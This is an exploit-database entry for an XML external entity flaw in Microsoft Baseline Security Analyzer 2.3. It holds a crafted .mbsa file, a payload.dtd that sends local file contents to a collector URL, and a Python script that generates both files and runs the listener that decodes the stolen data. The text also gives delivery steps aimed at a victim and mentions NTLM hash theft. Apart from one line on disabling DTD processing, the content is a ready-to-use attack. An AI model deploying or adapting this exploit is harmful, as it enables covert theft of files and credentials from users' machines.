Microsoft Baseline Security Analyzer 2.3 XML External Entity Injection Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2018-09-10 |
Type : local |
Platform : windows
# Security Issue
# Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker
# controlled server if a user opens a specially crafted ".mbsa" file.
# 1) the crafted ".mbsa" file
<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
# 2) "payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
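# Added example (not part of the original advisory): the attacker-side half of the
# out-of-band chain above, in Python. It generates the two files for any target path
# and collector URL, and runs the collector that serves payload.dtd and decodes what
# the victim's XML parser sends back in the query string. The 127.0.0.1:8000 listener
# matches the PoC; the output name poc.mbsa and the log format are assumptions.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote

# Assumed values (not from the advisory): the collector address matches the PoC's
# URL; in a real attack it would be an attacker-controlled host reachable by the victim.
COLLECTOR = "http://127.0.0.1:8000"
TARGET_FILE = r"C:\Windows\system.ini"


def build_mbsa(target_path: str, collector: str) -> str:
    """Return the crafted .mbsa document (stage 1 of the chain).

    %file reads the local target, %dtd fetches the external DTD from the
    collector, and expanding %dtd; inside the internal subset defines &send;.
    """
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE fileppe_fingerz [\n'
        f'<!ENTITY % file SYSTEM "{target_path}">\n'
        f'<!ENTITY % dtd SYSTEM "{collector}/payload.dtd">\n'
        '%dtd;]>\n'
        '<pwn>&send;</pwn>\n'
    )


def build_dtd(collector: str) -> str:
    """Return payload.dtd (stage 2).

    A parameter-entity reference (%file;) inside an entity value is only legal
    in the external subset, which is why the file contents are spliced into the
    URL here instead of in the .mbsa file itself.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!ENTITY % all "<!ENTITY send SYSTEM \'{collector}?%file;\'>">\n'
        '%all;\n'
    )


def decode_leak(request_path: str) -> str:
    """Recover the leaked contents from the request that &send; triggers
    (GET /?<file contents>); returns "" for requests without a query."""
    _, sep, query = request_path.partition("?")
    return unquote(query) if sep else ""


class Collector(BaseHTTPRequestHandler):
    """Serves payload.dtd to the victim's parser and records what comes back."""

    dtd_body: bytes = b""
    leaks: list = []

    def do_GET(self):
        if self.path.split("?", 1)[0].endswith("/payload.dtd"):
            body = self.dtd_body
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
        else:
            leaked = decode_leak(self.path)
            Collector.leaks.append(leaked)
            self.log_message("leaked %d chars: %r", len(leaked), leaked[:80])
            body = b""
            self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    Collector.dtd_body = build_dtd(COLLECTOR).encode()
    with open("poc.mbsa", "w", encoding="utf-8") as fh:  # placeholder file name
        fh.write(build_mbsa(TARGET_FILE, COLLECTOR))
    print("wrote poc.mbsa; open it on the MBSA host and watch this log")
    HTTPServer(("127.0.0.1", 8000), Collector).serve_forever()
```

# Run the script, deliver poc.mbsa to the victim, and the collector log shows the
# decoded contents when MBSA parses it. The leaked bytes travel inside a URL, so files
# with "<", "&", "%" or a lot of data tend to break either the DTD parse or the request;
# a small INI file such as system.ini is the reliable case. On the defensive side, an
# XML consumer that does not need DTDs should refuse them outright: in .NET that is
# XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit (and XmlResolver = null).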
# When the victim attempts to open the file they are prompted "Do you want to let this app
# make changes to your device?" However, the prompt also shows a "verified publisher", namely Microsoft,
# so the file looks trustworthy. After it is opened, the local user's files can be exfiltrated to a remote server.
# Moreover, the same technique can be used to steal NTLM hashes.
# Using Forced Authentication to steal NTLM hashes